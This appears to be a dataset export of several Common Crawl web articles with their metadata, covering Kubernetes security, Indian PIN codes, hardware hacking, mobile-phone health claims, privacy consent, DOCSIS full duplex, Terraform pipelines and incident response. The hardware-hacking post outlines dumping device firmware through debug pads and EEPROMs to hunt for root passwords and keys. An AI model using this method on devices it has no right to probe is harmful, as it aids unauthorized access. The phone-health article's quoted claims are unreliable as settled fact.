text
stringlengths
234
589k
id
stringlengths
47
47
dump
stringclasses
62 values
url
stringlengths
16
734
date
stringlengths
20
20
file_path
stringlengths
109
155
language
stringclasses
1 value
language_score
float64
0.65
1
token_count
int64
57
124k
score
float64
2.52
4.91
int_score
int64
3
5
Historically, the leading way to isolate and organize applications and their dependencies has been to place each application in its own virtual machine (VM). VMs make it possible to run multiple applications on the same physical hardware while keeping conflicts among software components and competition for hardware resources to a minimum. But virtual machines are bulky—typically gigabytes in size. They don’t really solve the problems of portability, software updates or continuous integration and continuous delivery. To resolve these issues, organizations have adopted Docker containers. This makes it possible to isolate applications into small, lightweight execution environments that share the operating system kernel. Typically measured in megabytes, containers use far fewer resources than virtual machines and start up almost immediately. In the past, applications were deployed by installing the applications on a host using the operating system package manager. This had the disadvantage of entangling the applications’ executables, configuration, libraries and life cycles with each other and with the host OS. It was possible to build immutable VM images to achieve predictable rollouts and rollbacks, but VMs are heavyweight and non-portable. These days, organizations deploy containers based on operating system-level virtualization rather than hardware virtualization. These containers are isolated from each other and from the host—they have their own file systems, they can’t see each others’ processes and their computational resource usage can be bounded. They are easier to build than VMs and because they are decoupled from the underlying infrastructure and the host filesystem, they are portable across clouds and OS distributions. Also, containers are small and fast; therefore, one application can be packed in each container image. This one-to-one application-to-image relationship unlocks the full benefits of containers. Similarly, immutable container images can be created at build/release time rather than at deployment time, since each application doesn’t need to be composed with the rest of the application stack or married to the production infrastructure environment. Generating container images at build/release time enables a consistent environment to be carried from development into production. Containers are much more transparent than VMs, which facilitates monitoring and management. This is especially true when the containers’ process life cycles are managed by the infrastructure rather than hidden by a process supervisor inside the container. Enter Kubernetes. This open source container orchestration system for automating deployment, scaling and management of containerized applications was designed by Google and is now maintained by the Cloud Native Computing Foundation. It aims to provide a platform for automating deployment, scaling and operations of application containers across clusters of hosts. At its basic level, Kubernetes is a system for running and coordinating containerized applications across a cluster of machines. It is designed to completely manage the life cycle of containerized applications and services using methods that provide predictability, scalability and high availability. The need to move to the cloud for scalability and availability has spurred the need to use containerized development technologies, which in turn has witnessed the spectacular growth and adoption of Kubernetes as an enabling platform. The central component of Kubernetes is the cluster. A cluster is made up of many virtual or physical machines that each serve a specialized function either as a master or as a node. Each node hosts groups of one or more containers (which contain your applications) and the master communicates with nodes about when to create or destroy containers. At the same time, it tells nodes how to re-route traffic based on new container alignments. As a Kubernetes user, you can define how your applications should run and the ways they should be able to interact with other applications or the outside world. You can scale your services up or down, perform graceful rolling updates and switch traffic between different versions of your applications to test features or roll back problematic deployments. Kubernetes provides interfaces and composable platform primitives that allow you to define and manage your applications with high degrees of flexibility, power and reliability. But such spectacular growth in innovation is outpacing current security measures and controls, rendering existing security solutions ineffective. Cloud-native apps require a new approach. There is an inherent lack of security knowledge by software developers when you consider the landscape of trying to secure all of these containers in the cloud. In fact, vulnerabilities can be introduced at any point of the development life cycle while unsecured or unreviewed code can be easily deployed into production, leaving applications and data at risk. At the end of the day, these containers are public-facing, enclosing all types of sensitive data and compliance with the privacy and the regulatory framework demands a portfolio of security tools that can help to manage compliance with DevOps. This new paradigm can be further formulated with DevSecOps, once again highlighting the need for converging security with the several stages of the software development and release life cycle. The best way to achieve this is to deploy an end-to-end Kubernetes security platform that monitors clusters for anomalies while securing the developed applications against all sorts of known and unknown attacks. The rapid pace of application deployment and the highly automated runtime environment enabled by tools such as Kubernetes makes it critical to consider runtime Kubernetes security automation for all business-critical applications. If you have any questions about securing Kubernetes, contact us today to help you out with your performance and security needs. This article originally appeared at Container Journal on March 9, 2020
<urn:uuid:4de94023-7f6f-44ba-8763-baabb3dc2aa4>
CC-MAIN-2022-40
https://www.globaldots.com/resources/blog/securing-kubernetes-and-the-container-landscape/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00251.warc.gz
en
0.9331
1,112
3.203125
3
PIN Code Explained - What does the PINCODE (Postal Index Number) mean? The Postal Index Number (PINCODE) is an important part of any address in India. But why is that important and how does it help the postal department? Here is making sense of the 6 digit PINCODE. What does the PINCODE (Postal Index Number) mean? Why do the Postal Department & Courier firms ask you to write the PINCODE of the addressee? Why is it so important? Postal Index Number (PIN) or PIN Code is a 6 digit code of Post Office numbering used by India Post. The PIN was introduced on August 15, 1972. There are 9 PIN regions in the country. The first 8 are geographical regions and the digit 9 is reserved for the Army Postal Service. The first digit indicates one of the regions. The second digit indicates the sub region or one of the postal circles (States). The third digit indicates a sorting / revenue district. The last 3 digits refer to the delivery Post Office. The first digit of PIN indicates as below: |First Digit||Region||States Covered| |1||Northern||Delhi, Haryana, Punjab, Himachal Pradesh and Jammu & Kashmir| |2||Northern||Uttar Pradesh and Uttaranchal| |3||Western||Rajasthan and Gujarat| |4||Western||Maharashtra, Madhya Pradesh and Chattisgarh| |5||Southern||Andhra Pradesh and Karnataka| |6||Southern||Kerala and Tamil Nadu| |7||Eastern||West Bengal, Orissa and North Eastern| |8||Eastern||Bihar and Jharkand| |9||APS||Army Postal Service| The first 2 digits of PIN indicate as below: |First 2 Digits of PIN||Circle| |12 and 13||Haryana| |14 to 16||Punjab| |18 to 19||Jammu & Kashmir| |20 to 28||Uttar Pradesh and Uttaranchal| |30 to 34||Rajasthan| |36 to 39||Gujarat| |40 to 44||Maharashtra| |45 to 49||Madhya Pradesh and Chattisgarh| |50 to 53||Andhra Pradesh & Telangana| |56 to 59||Karnataka| |60 to 64||Tamil Nadu| |67 to 69||Kerala| |70 to 74||West Bengal| |75 to 77||Orissa| |80 to 85||Bihar and Jharkand| |90 to 99||Army Postal Service (APS)| If the PINCODE is 500072, then 5 indicates Southern region & 50 indicates Telangana. 500 indicates the district of Rangareddy/Hyderabad and the last 3 digits (072) indicate the KPHB colony post office in this area. That is how the postal department sorts the incoming mails and routes them to the correct post office.
<urn:uuid:36594608-809c-4ce0-ba01-b01bfd1ab306>
CC-MAIN-2022-40
https://www.knowledgepublisher.com/article/1254/pin-code-explained-what-does-the-pincode-postal-index-number-mean.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334912.28/warc/CC-MAIN-20220926144455-20220926174455-00251.warc.gz
en
0.764353
687
3.734375
4
Hardware hacking is the process of taking a physical piece of hardware, taking it apart to see what makes it tick, and then either modifying it to make something new or using the gained knowledge to exploit weaknesses in the hardware design. Entire communities have been built upon this process (A large one is the maker community) and now its time to join them! First a brief history lesson Before we dive into how to hack hardware, the different components, and the process of hacking it, a basic understanding of the physics of electricity are necessary. (Note this is a very quick and dirty lesson on electricity and there is always more to learn). First off we have voltage, voltage is the difference in electrical potential energy between two points. V = I * R Above is ohms law which states voltage (V) equals current (I) times resistance (R). Both of which are things I will get to soon. What’s important to understand is that circuits have an certain amount of voltage that needs to be supplied in order for them to operate, this is called the bias voltage. A circuit’s documentation will also specify an operating range for the voltage at which it is safe to run the parts at. Resistance is what it sounds like, it is how resistant a material is to transferring an electric charge and is measured in Ohms. Current is how much charge is flowing though the circuit and is measured in amperes (or amps for short) . The importance of these two values goes hand in hand because certain parts run better with higher or lower currents (Some parts explode when you run too much current through them). Ohms law can be rearranged to help tell you the values you need to know. I = V/R R = V/I In ohms law, delta V (change in voltage) can be substituted for V to figure out resistor values (I will explain resistors more when I talk about components). Lets talk about an LED, an LED has a bias voltage of 2.2v and safely operates at 20mA (.02 amps), If you wanted to power it safely from a 3.3v power supply you can calculate the resistor value you would need as so: (The following math assumes two significant figures) R = 3.3 - 2.2 / .02 R = 55 ohms Congrats you just figured out you need a 55 ohm resistor. Components and tools Now that you have learned some basics physics, its time to move on to the tools you will need to hack some hardware. Starting with a list of tools: - Multimeter: Used to measure voltage, resistance and current - Soldering Iron: Used to assemble/dissemble circuits - Breadboards: Used to prototype circuits - Bus pirate: Can be used for a slew of things like OCD (On chip Debugger), SPI (Serial Peripheral Interface), JTAG (Named after the group that developed it; Is another programming/debugger interface), and ISP (In-circuit serial programmer) (These will be introduced more in level 2) Moving on to a list of components and what they do: - LED: Light Emitting Diode - Resistor: Raises resistance in a circuit - Capacitor: Charges and discharges at a given interval, used to lessen demand on a power supply - IC: Integrated circuits. What most people think of as “chips” - EEPROM (Electrically Erasable Programmable Read-Only Memory): Embedded devices use these as a means of storage. - Timer: Oscillates at a given frequency - Microcontrollers: Tiny little computers. Sometimes they are just CPUs (Central Processing Units), other times they include ram, and flash storage. Popular platforms are.. - Crystals: Oscillate at a given frequency, similar to a timer - Transformers: Used to convert between voltage levels - Diodes: Used to limit current flow in one direction Level 0: Baby Steps Before you go taking apart any devices or adding on to them, it’s first important to understand how to build your own devices. I suggest starting with an Arduino nano (At the time of writing a pack of 3 nanos are 13-14 dollars on Amazon). From there you can use a resistor, an LED, and some jumper wires to build a circuit which you can program to blink. As simple this may seem it is a perfect beginners project into the world of digital electronics. From this you have already learned the following: - How to program a microcontroller - How to build a simple circuit - Prototyping on a bread board each of which are extremely valuable skills for hardware hacking. In this step, I am not going to re-write something that I think the Arduino foundation has already written extremely well in in detail. Follow the steps in the following tutorial to get started with Arduinos. Level 1: Taking apart/building upon other circuits Hopefully by now you have made a few different Arduino programs to control various circuits of your design. (See the link above!) Now it is time to move along to the next steps of the hardware hacking process. The first thing you want to do when looking at an unknown circuit is to start looking for any ICs. If you find them, chances are they will have some kind of text on them — generally the part number for that IC. As soon as you identify the part number, Google it! If you’re lucky, you will find documentation about that IC. Reading through IC documentation can seem scary, but begin with finding the following tidbits of information first: - Operating voltage - Pin outs (What certain pins on a microcontroller/IC are used for) - Operating currents - What the IC is used for Figuring out those things can help you to figure out more about what the individual parts of a circuit are doing. From there you can start to mod the circuit. For example, say you wanted to be able to make your TV remote rechargeable. You could just buy rechargeable batteries, or you could measure the output voltage of the batteries in the remote and then build in a LIPO battery pack with USB charging capabilities. Is this easier? No. More educational and fun? Yes. Another somewhat easy hardware hacking project would be to create modded video game controllers. (Just be sure not to cheat when playing online.) To mod a video game controller, all you would need to do is measure the operating voltage using a multimeter and then program and wire-up a mircocontroller (that operates at an appropriate voltage) to various inputs on the controller to simulate user interaction. Now you have a DIY controller mod chip! Level 2: Attacking the hardware Okay, so the majority of the blog thus far has talked about modding and building onto hardware which is fun and has its own uses. Now let’s talk about going on the attack and violating the security of the hardware (using some simpler attack vectors). After going through and determining the various ICs in the circuit for the device you are planning on attacking, you can create a plan of attack. When looking at the circuit, you may be able to identify things called test pads on the PCB (Printed Circuit Board). Test pads are used by manufacturers to automate testing of device PCBs in the factory, but sometimes debug interfaces are left enabled in production devices. This is done to allow for debugging on a device returned because of hardware malfunctions. The problem with this is that it gives attackers the potential ability to dump device firmware and begin the software reverse engineering process. You may be wondering what I mean by debugging interfaces. Earlier, I said I would talk more about SPI, JTAG, and ISP — well, those are examples of different hardware communication protocols which sometimes can be used for debugging. You can connect to one of these interfaces by determining what pads correspond to what wire in the communication protocol standard (sometimes they are labeled, other times you need to use something like a logic analyzer to determine what is what), soldering a jumper wire from the pad to a breadboard, hooking it up the correct corresponding pin of a bus pirate, and then running the correct tools. If the embedded device you are trying to hack happens to have an EEPROM model, you can also use a bus pirate to extract the contents of the EEPROM. After extracting the contents of the EEPROM, you can run a command line tool like binwalk on the bin file to search for any embedded filesystems. A common thing to see in embedded devices is Linux with some kind of read-only filesystem like SquashFS. Using binwalk, you can extract these artifacts and then start to search through the device for weaknesses (root password, encryption keys, etc). As a ending note for Level 2, there are more complicated hardware attacks that can be performed against embedded devices, but I am not going to cover them because I do not have the money to afford the necessary hardware to perform some of these attacks. I mean, the explanation for some of them are large enough to fill up their own blog post. Now go out there and hack some hardware! With love and root shells – wolfshirtz
<urn:uuid:9cd7cb1c-4e47-4168-9d36-60e471e49d20>
CC-MAIN-2022-40
https://cryptokait.com/2020/07/17/breaking-boards-hacking-hardware/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00251.warc.gz
en
0.935599
1,932
3.65625
4
Medical experts are now reporting that smartphones are leading to physical changes in the human body. Although many cellular operators have been citing studies that have suggested that the use of mobile devices such as cell phones are safe for human health, medical experts are indicating that changes are occurring in the human body among people who use these gadgets. Among the changes that medical experts have pointed out are those made to the metabolism. According to Maulana Azad Medical College radiation oncology professor, Manoj Sharma, “Cancer is not the only health issue linked to mobile phones. Fatigue, sleep disorder, lack of concentration and poor digestion have been found to be linked with mobile phone usage.” Sharma spoke at the India International Center, where there was a discussion on “Mobile Phone Radiation and Health”. Sharma pointed out that there had not been any solid research on the long term health impacts of mobile devices. Sharma discussed the idea that the close proximity of a cellular phone to the brain while it is being used could increase the risk of the development of a brain tumor. “There doesn’t seem to be any worry about the looming disaster. If we don’t take care now it will be too late like in the case of tobacco,” he said. He went on to say that he feels that mobile operators in India should use technology similar to that being used in the United States, which reduces radiation exposure of the human body by smartphones. At the event, another Maulana Azad College professor, Naresh Gupta, added that “It is true that the metabolism in the body is affected by using mobile phones.” He explained that these gadgets are an evolving technology and that the majority of the research that has been conducted with respect to their health impacts was conducted through the funding of the private companies that manufacture those devices in the first place. “We don’t have any independent research.” That said, it was also pointed out by All India Institute of Medical Sciences (AIIMS) plastic surgeon, S.B. Gogia, that mobile devices could also have a positive impact on health, if the indirect benefits of these gadgets are considered. He said that there have many situations in which “lives have been saved in case of accidents and other medical emergencies due to mobile phones.”
<urn:uuid:5575cef4-1ac5-455a-8ed0-1943502b8896>
CC-MAIN-2022-40
https://www.mobilecommercepress.com/mobile-devices-can-cause-metabolic-changes-people/8513661/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00251.warc.gz
en
0.972735
484
3.25
3
The last few years have seen a phenomenal revolution in digital spaces, which has completely transformed the way businesses deal with advertising, marketing, or any kind of data sharing. Further, most major privacy laws worldwide, such as the CCPA (California’s Consumer Privacy Act) or Europe’s GDPR (General Data Protection Regulation) now demand that companies prioritize data privacy during specific data collection and processing efforts. This creates a need for easy and effective mechanisms on websites that offer simple means for users to allow consent (also known as an “opt-in”) or refuse consent (also known as an “opt-out”) for withdrawing their consent at any point in time. Data protection laws like GDPR and CCPA have given a lot of traction to the concept of opt-in and opt-out, thus making it difficult to share or use people’s data without their consent unless for other lawful reasons. Opt-in and Opt-out are two mechanisms that have become quite popular to handle the consent requirements of the GDPR. This blog aims to explore the concept of opt-in vs. opt-out in more detail, including what they entail, their real-life use cases, and when/how to use them for data processing. What is Opt-In? Opt-in essentially means that users offer their consent and will take affirmative action towards it. In simple words, the purpose of opt-in is to give permission or accept something. One of the most common ways businesses implement opt-in methods is through checkboxes. When given an option of a checkbox, the user must take action to check the box, which signifies their consent. What is implied by Opt-Out Privacy Consent? As the term suggests, opt-out primarily means that users take a desired action to withdraw their consent. In simple words, opt-out refers to the act of users withdrawing or refusing consent in response to a particular event/process. For example, here is how a global brand uses a pop-up opt-in banner to gain explicit consent from their users: Opt-in and Opt-out Real Life Use Cases This section explores some real-life use cases for opt-in or opt-out options and how each of these are implemented: - Using Cookies Many companies today use third-party cookies for analytical and advertising purposes. In such a case, explicit consent is requested from the users by providing them with a simple and clear opt-in/opt-out option. How can you do this– You can implement an opt-in option here using cookies consent banners. Likewise, users must be given an option to withdraw or reject the usage of cookies should they deem fit. Cookie banners should either have a reject option or a link to manage cookies where they are given an option to choose what type of cookie they don’t want to store on their device. - Collecting personal data Another common use case for opt-in is when you collect users’ personal data, including special categories of data, and when legal/contractual obligations, legitimate/public interest, or other legal basis of processing are not applicable. How can you do this – There are several opt-in methods you can choose to request user consent, including opt-in buttons or links, consent forms on emails, paper forms, oral consent, yes/no options, preference dashboard settings, or opt-in boxes on paper/electronically. Similarly, users also have the complete right to reject acquiescing to collect/process their data if they deem fit. In such cases, you need to either delete the data or temporarily terminate data processing. To implement this, you can include a contact point or a link to submit consent opt-out requests. - Collecting email addresses for newsletters and other marketing purposes Often, businesses require the email addresses of their users to send them newsletters or other marketing updates. In such a scenario, it is necessary to seek their permission before storing their email ids on your database. How can you do this – The best way to implement the opt-in options here include using website footers, inserting checkboxes at the end of forms and on business blog posts, or through emails sent to the customers. Likewise, if the users feel the need to stop receiving such content on their email addresses, they should be able to easily unsubscribe by accessing an unsubscribe link in the emails or on the website. How Opt-in/Opt-out are Related to GDPR and CCPA OPT-in Under GDPR As per the GDPR guidelines, personal data processing can only be performed after procuring consent from related individuals. Getting GDPR consent is a must only when a business processes the sensitive data of its users. These include genetic/biometric data, racial or ethnic origin, health data, political opinions, sexual orientation, religious or philosophical data, etc. To be able to process any such sensitive personal information, businesses need to take explicit consent from their users via opt-in or other suitable methods. Opt-in under the GDPR primarily applies to any organization operating within the EU (and any organizations outside of the EU offering goods or services to customers in the EU). GDPR applies to all organizations established inside and outside the EU, hence the opt-in mechanism is automatically applicable here. Opt-Out under CCPA Under CCPA consumers have the right to opt out and stop businesses from selling their personal information. All organizations complying with CCPA need to follow clearly defined policies to be able to facilitate consumers with their right to opt-out of the sale of their personal information. CCPA also requires all businesses to have either a link or a button stating “Do Not Sell My Personal Information” as a mandatory requirement. There are multiple circumstances where using an opt-in method is more appropriate as compared to using an opt-out method and vice versa. However, it is important to remember that since privacy laws aren’t the same everywhere, it is always a best practice to adhere to the strictest legislation to the extent possible. From a business perspective, it is safer approach to employ both opt-in and opt-out options in situations as needed to ensure customers’ privacy needs and fulfillment of the law. The need is to understand that it is not simply about complying with the law but about respecting your users by providing them more autonomy and control over the privacy of their personal information. For further help Secuvy offers a Universal Consent Management Platform to streamline Consent Management for businesses. What is GDPR Compliance? Not everyone is aware of GDPR, especially when your...
<urn:uuid:08410bdb-5554-4f7f-b5cd-7ffba6e698bc>
CC-MAIN-2022-40
https://secuvy.ai/blog/opt-in-vs-opt-out-privacy-rights/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335491.4/warc/CC-MAIN-20220930145518-20220930175518-00251.warc.gz
en
0.913188
1,484
2.8125
3
Written by John Holobinko, Director Access Strategy, Cable Access Business Unit Traditional cable access systems can only transmit data in one direction across any part of the spectrum. Compared to PONs, a cable access network is severely limited in the maximum symmetrical data speed it can support, usually under 200 Mbps. What if spectrum was no longer dedicated to a single direction, but supported simultaneous data transmission in both directions simultaneously? The technology for doing this is being developed now, and Cisco is in the forefront of this breakthrough. FDX is a new technology that enables simultaneous downstream and upstream communications over the same cable RF spectrum. With FDX, D3.1 channels can be transmitted simultaneously in both directions without data throughput loss in either direction. FDX is being developed primarily for N+0 plant architectures, i.e. systems where there are only optical nodes and only passive coax with no amplifiers following. The biggest challenge in bidirectional transmission on the same frequencies is how to recognize return path signals at the point where they are at their lowest RF level while forward path signals on the same frequencies are at their highest level. The point in the network where this occurs is at each optical node output/input port. In an N+0 network the output level of the highest forward path carriers can be over 60dBmV. In contrast, the received carriers from cable modems can be 10 dBmV. If you think of only the return path, this means that there is somewhat coherent “noise” level that is represented by the forward path signals, that is virtually 50 dB greater than the signal level! Knowing the forward path signal and using digital subtraction, you can remove this unwanted forward path “noise” to recover the return path signal. If this were the only thing required, FDX would be easy. However, when forward path signals leave the node and reach the first coaxial cable tap they are reflected back towards the node. Assume the best taps provide 25 dB of return loss. If there is 2.5 dB of cable loss to the first tap, that means that the reflected signal is 60 dBmV – 2.5dB – 25.0dB – 2.5dB = 30 dBmV compared to a return path modem signal of 10 dBmV! We are used to measuring the signal to noise ratio as a positive number. In this case, the relative SNR is a negative 20 dB! Consider that there are many reflections at various frequencies. This makes recovery of the return path signals far more complicated. FDX technology uses powerful digital signal processing algorithms to derive return path signal from forward path signals and reflections, and Cisco has led the CableLabs effort in contributing technology for the FDX standard. Based on cable modem output signal power limitations, the standard currently defines symmetrical operation up to 684 MHz. FDX supports traditional cable modems and FDX modems in the same network simultaneously. Therefore, to support the FDX standard requires a node based Remote PHY and requires that the node return path gain sections support 700 MHz bandwidth operation. Cisco is currently developing an FDX capable node based on its 1.2 GHz GS7000 super high output node technology. Customers with existing GS7000 nodes will be able to upgrade these nodes to Remote PHY and FDX.
<urn:uuid:49458815-0181-433d-9c91-e28466ecb7c7>
CC-MAIN-2022-40
https://blogs.cisco.com/sp/lifting-the-veil-on-full-duplex-docsis
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337516.13/warc/CC-MAIN-20221004152839-20221004182839-00251.warc.gz
en
0.927608
683
2.703125
3
Terraform is an open-source IaC device created by Hashicorp, to arrange foundation and gives numerous advantages to the administration and tasks of your current circumstance. Its flexibility, decisive language, and the profitability gains of utilizing a similar Infrastructure as Code (IaC) tooling across various cloud suppliers have created Terraform perhaps the most mainstream apparatuses for foundation provisioning. Mechanization of Terraform conveyance while guaranteeing legitimate security and alleviation of normal dangers and mistakes is one of the principal points across our DevOps groups. Through AWS DevOps Training, there are likewise main security conditions that we could understand from this post. What is Terraform? Terraform is an apparatus for creating, altering, and forming frameworks securely and proficiently. Terraform can handle existing and mainstream specialist co-ops just as custom in-house arrangements. Configuration documents depict to Terraform the parts expected to operate a solitary application or your whole datacenter. It creates an implementation plan depicting how it will deal with arriving at the ideal state and afterward implements it to fabricate the portrayed foundation. Terraform can figure out what altered and made steady implementation plans that could be applied as the arrangement changes. The Terraform can handle the infrastructure that incorporates low-level segments, for example, stockpiling, computing instances, systems administration, and significant parts like SaaS features, DNS entries and so on. Features of Terraform The key features of Terraform are: - Infrastructure as Code: This is depicted utilizing a high-level setup syntax. It permits a plan of your datacenter to be formed and executed as you would with some other code. Also, it can be shared and re-utilized. - Execution Plans: Terraform has an arranging step where it creates an implementation plan. The implementation plan displays what it will do while you choose to apply. It allows you to evade any shocks when Terraform controls the framework. - Resource Graph: Terraform assembles a diagram of every one of your assets, and parallels the creation and alteration of any non-subordinate assets. Along these lines, Terraform fabricates the framework as proficiently as could really be expected, and administrators get an understanding into the conditions in their foundation. - Change Automation: Intricate changesets could be applied to your foundation with the negligible human association. Using the recently referenced implementation plan and asset chart, you can precisely understand how Terraform will alter and in which way, evading numerous conceivable human errors. Why is a Secure Terraform Pipeline required? The objective is to make an interaction that permits a client to bring alterations into a cloud climate without having unequivocal authorizations for manual activities. The method is as per the following: - A change is inspected and converged with a pull demand after a survey of the necessary commentators. There could be no alternate method to present the change. - The change is sent to a test climate. Prior to that, the Terraform plan is evaluated physically and affirmed. - The change should be tried/endorsed in a test climate. - The Terraform plan is affirmed for the arranging climate and the change is actually equivalent to in the test climate. - Terraform changes are applicable to arrange the use of an assigned Terraform framework account. There could be no alternative method to utilize this Terraform account as in this progression of the method. - Follow similar techniques to elevate changes from organizing to the creative climate. Environments (dev/uat/stage/prod) have an appropriate degree of partition guaranteed: - Diverse framework accounts are utilized for Terraform in these conditions. Each Terraform framework account has consents just for its own current circumstance. - Network availability is restricted between assets across various conditions. - Only an assigned set of specialists arranged in a unique virtual organization is allowed to change the framework (execute Terraform) and access sensitive assets (for example Terraform backend, key vaults, and so forth) It is beyond the realm of imagination to expect to deliver utilizing a non-prod construct agent. - There is an approach to guarantee that Terraform design is just about as comparable as conceivable between conditions. - Terraform backends in higher conditions (for example UAT) aren’t open from local machines. It may very well be available from fabricate machines and alternatively from assigned stronghold hosts. - An alteration to a higher climate can be sent just on the off chance that it was recently tried in a lower climate. There is a technique to guarantee that this is the very same Git revision tried. The change must be presented with a pull demand with a necessary audit measure. - A choice to apply Terraform alterations can be just permitted after a manual Terraform plan audit and endorsement on every climate. System Accounts for Terraform - Terraform operates with a framework account as opposed to a client account whenever the situation allows. Different system accounts are used for: - Terraform (a framework client that alters the foundation), - Kubernetes (a framework client that is utilized by Kubernetes to make necessary assets for example load balancers or to download docker pictures from the repo), - Runtime application parts (when contrasted with fabricate time or delivery time). - Framework accounts that are allowed to Terraform changes can be utilized uniquely in assigned CD pipelines. It is beyond the realm of imagination that one can utilize a Terraform framework account in a recently made pipeline without consent. - Access to utilize the Terraform framework account is allowed in time for the delivery. Then again, the framework account is conceded authorizations just for the hour of arrangement. - Framework accounts in higher conditions have consents restricted to just what is needed to execute activities. - Limit consents to just the sorts of assets that are utilized. - Eliminate consents for erasing basic resources (for example databases, stockpiling) to evade mechanized re-formation of these assets and losing information. Unique consents ought to be conceded just in time under such cases. Having a common Terraform backend is the initial step to constructing a pipeline. A Terraform backend is the main segment that manages shared stockpiling, implementation, just as locking, to forestall framework alteration by numerous Terraform measures. - As initial documentation: - Terraform Backend Configuration - AWS S3 - Azure storage account - backend providers list - GCP cloud storage - Remote backend for Terraform Cloud/Enterprise - Ensure that the backend foundation has sufficient insurance. State records will include all data which passes through Terraform (secret passwords, keys and so forth) - It will in all likelihood be Google Cloud Storage, AWS S3+DynamoDB, or Azure Storage Account. - Separate framework (organization + RBAC) of creation and non-prod backends. - Plan to incapacitate admittance to state records (network access and RBAC) from outside of an assigned organization. - Try not to keep the Terraform backend framework in the run-time climate. Utilize separate records/projects/membership and so on. - Empower object forming/soft delete choices on your Terraform backends to try not to lose changes and state-documents, and to keep up Terraform state history. In some exceptional cases, manual admittance to Terraform state documents will be necessary. Factors like breaking changes or fixing imperfections and refactoring will need operating Terraform state tasks by activities workforce. For such events, plan uncommon commanded admittance to the Terraform state utilizing stronghold hosts, VPN, and so on. By utilizing Terraform Cloud/undertaking with a far-off backend, the apparatus will deal with necessities for state stockpiling. Divide Into Multiple Projects Terraform permits you to isolate the structure into modules. You ought to consider isolating your whole framework into discrete activities. A “Terraform project” is a solitary piece of the framework that can be presented in numerous conditions, typically using a single pipeline. Terraform tasks will coordinate with cloud designs like landing zones (Azure and AWS), Shared VPC, chub-and-spoke network geography. There are numerous examples in Architecture Center, AWS Well-Architected Framework, Google Cloud Solutions or Azure Cloud Adoption Framework. It is required when Terraform remote state-documents are put away in the cloud. It will be a basic venture which would make the foundation needed for the backends of different tasks. Keep away from stateless activities. Have a different venture (or undertakings) to set-up the presence in the cloud, an organization or a VPN association. Developing a landing zone is a different subject. Host Runtime Infrastructure Runtime conditions have a few requirements and bits of foundation that may be divided among prod and nonprod conditions, for example, DNS, bastion hosts, key vaults. This is additionally a decent spot to design organization agent pools separately for the creation and non-prod conditions. This is the foundation under the administrations and applications performing the business. Be certain that there is a climate to analyze Terraform contents, not really the application which is tried in, try not to intrude on the QA collaboration while applying possibly flawed Terraform designs. Also, be organized to isolate runtime conditions across groups, administrations, and divisions. It very well may be difficult to have a solitary project with the entire organization’s creation climate. As there are numerous advantages to utilizing Terraform as a component of your framework provisioning work process. We face difficulties of conveying Terraform arrangements at scale: on top of all significant cloud suppliers, supporting huge associations in the exceptionally directed climate of monetary administrations, with various groups operating in conditions in numerous locales around the planet.
<urn:uuid:d416abb4-11cd-49f1-81b4-a41437b092cd>
CC-MAIN-2022-40
https://www.kovair.com/blog/terraform-security-for-devops-guide/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338001.99/warc/CC-MAIN-20221007080917-20221007110917-00251.warc.gz
en
0.908277
2,059
2.578125
3
The purpose of an incident response plan is to prepare organizations for a possible security incident that could occur without notice. Having a strategic plan in place to address cybersecurity problems is crucial to preventing the financial and reputational consequences that can follow a breach of privacy incident. There are six main phases involved in an incident response plan. Each phase is important and should be completed in full before progressing to the next phase. Among the most important of all the steps in an incident response plan is the preparation stage. During the preparation phase, organizations should establish policies and procedures for incident response management and enable efficient communication methods both before and after the incident. Employees should be properly trained to address security incidents and their respective roles. It is important for companies to develop incident response drill scenarios that are practiced on a regular basis and modified as needed based on changes in the environment. All aspects of an incident response plan, including training, software and hardware resources and execution, should be fully approved and funded before an incident occurs. The identification phase of an incident response plan involves determining whether or not an organization has been breached. It is not always clear at first whether a breach or other security incident has occurred. In addition, breaches can originate from a wide range of sources, so it is important to gather details. When determining whether a security incident has occurred, organizations should look at when the event happened, how it was discovered and who discovered the breach. Companies should also consider how the incident will impact operations, if other areas have been impacted and the scope of the compromise. If it is discovered that a breach has occurred, organizations should work fast to contain the event. However, this should be done in the appropriate way and does not require all sensitive data to be simply deleted from the system. Instead, strategies should be developed to contain the breach and prevent it from spreading further. This may involve disconnecting the impacted device from the internet or having a back-up system that can be used to restore normal business operations. Having remote access protocols in place can help ensure that a company never loses access to their system. Neutralization is one of the most crucial phases of the incident response process and requires the intelligence gathered throughout the previous stages. Once all systems and devices that have been impacted by the breach have been identified, an organization should perform a coordinated shutdown. To ensure that all employees are aware of the shutdown, employers should send out notifications to all other IT team members. Next, the infected systems and devices should be wiped clean and rebuilt. Passwords on all accounts should also be changed. If a business discovers that there are domains or IP addresses that have been affected, it is essential to block all communication that could pose a risk. The recovery phase of an incident response plan involves restoring all affected systems and devices to allow for normal operations to continue. However, before getting systems back up and running, it is vital to ensure that the cause of the breach has been identified to prevent another breach from occurring again. During this phase, consider how long it will take to return systems to normal, whether systems have been patched and tested, whether a system can be safely restored using a backup and how long the system will need to be monitored. The final step in an incident response plan occurs after the incident has been solved. Throughout the incident, all details should have been properly documented so that the information can be used to prevent similar breaches in the future. Businesses should complete a detailed incident report that suggests tips on how to improve the existing incident plan. Companies should also closely monitor any post-incident activities to look for threats. It is important to coordinate across all departments of an organization so that all employees are involved and can do their part to help prevent future security incidents. Contact the Risk Management Consulting Experts at Hartman Executives As security breaches and system hacks become more common due to advancements in technology, organizations must go the extra mile to protect their systems and devices. An incident response plan is an effective way to swiftly address security problems and gain knowledge that can be used to prevent repeat security problems. Organizations should also reach out to a risk management consultant to learn the best ways to protect and restore their business. The risk management consulting experts at Hartman Executive Advisors have extensive experience working with clients to assess their unique cybersecurity risks, as well as planning and implementing solutions to address these security issues.
<urn:uuid:1a3e4962-65d2-442a-8edc-42c83734557e>
CC-MAIN-2022-40
https://hartmanadvisors.com/the-6-phases-of-an-incident-response-plan/
null
